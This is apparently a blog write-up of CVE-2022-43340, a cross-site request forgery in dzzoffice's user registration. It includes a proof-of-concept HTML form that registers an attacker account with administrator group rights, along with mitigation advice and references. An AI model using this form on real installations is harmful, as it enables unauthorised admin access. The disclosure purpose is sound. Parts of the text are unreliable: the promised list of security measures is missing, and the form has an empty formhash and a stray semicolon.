CVE-2022-43340 - A Cross-Site Request Forgery in dzzoffice 2.02.1_SC_UTF8: Creating User Accounts and Exploiting Administrator Rights

In this post, we'll be discussing a recently discovered security vulnerability CVE-2022-43340, which involves a Cross-Site Request Forgery (CSRF) in a popular web-based collaboration tool called dzzoffice 2.02.1_SC_UTF8. This vulnerability allows attackers to exploit the user registration process and grant administrator rights to regular users. We'll be going in-depth into the exploit, providing code snippets, links to original references, and important details surrounding the issue.

Issue

dzzoffice is a powerful open-source office collaboration software that enables users to create, edit, and share different types of documents. The vulnerability in question is a Cross-Site Request Forgery (CSRF) that exists within the user registration module of dzzoffice, which allows an attacker to send a forged HTTP request on behalf of an unsuspecting victim. This can result in the creation of unauthorized user accounts and potentially grant administrator rights to regular users.

Exploit Details

To exploit this vulnerability, an attacker can use a crafted HTTP request via either a GET or POST request. This request will include the necessary parameters to create a user account with administrator privileges.

A sample HTML form that demonstrates this exploit is shown below

<!DOCTYPE html>
<html>
<head>
  <title>CVE-2022-43340 - CSRF Exploit</title>
</head>
<body>
  <h1>CVE-2022-43340 - CSRF Exploit</h1>
  <form action="http://<target>/dzzoffice/index.php?mod=user&op=register"; method="POST" enctype="multipart/form-data">
    <input type="hidden" name="formhash" value="" />
    <input type="hidden" name="username" value="attacker" />
    <input type="hidden" name="password" value="p@sswrd" />
    <input type="hidden" name="password2" value="p@sswrd" />
    <input type="hidden" name="email" value="attacker@example.com" />
    <input type="hidden" name="groupid" value="1" />
    <input type="submit" value="Submit" />
  </form>
</body>
</html>

When the victim clicks the "Submit" button on the above HTML form, a new user account will be created for the attacker, and the attacker will be granted administrative rights.

Mitigation

As a temporary solution, disable user registration in the application settings until a patched version is released. To address this vulnerability, developers should implement the following security measures:

For more information about this vulnerability, please refer to the following links

- MITRE CVE page: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43340
- NIST National Vulnerability Database (NVD) page: https://nvd.nist.gov/vuln/detail/CVE-2022-43340

Conclusion

In conclusion, CVE-2022-43340 is a critical security vulnerability that affects dzzoffice 2.02.1_SC_UTF8 and can lead to unauthorized access, data breaches, and potential downtime for the application. It is crucial for administrators to take appropriate security measures and ensure their systems are protected against such attacks. Keep an eye out for patches and updates from dzzoffice, and ensure that your applications are always up to date with the latest security fixes.

Timeline

Published on: 10/27/2022 20:15:00 UTC
Last modified on: 10/31/2022 15:57:00 UTC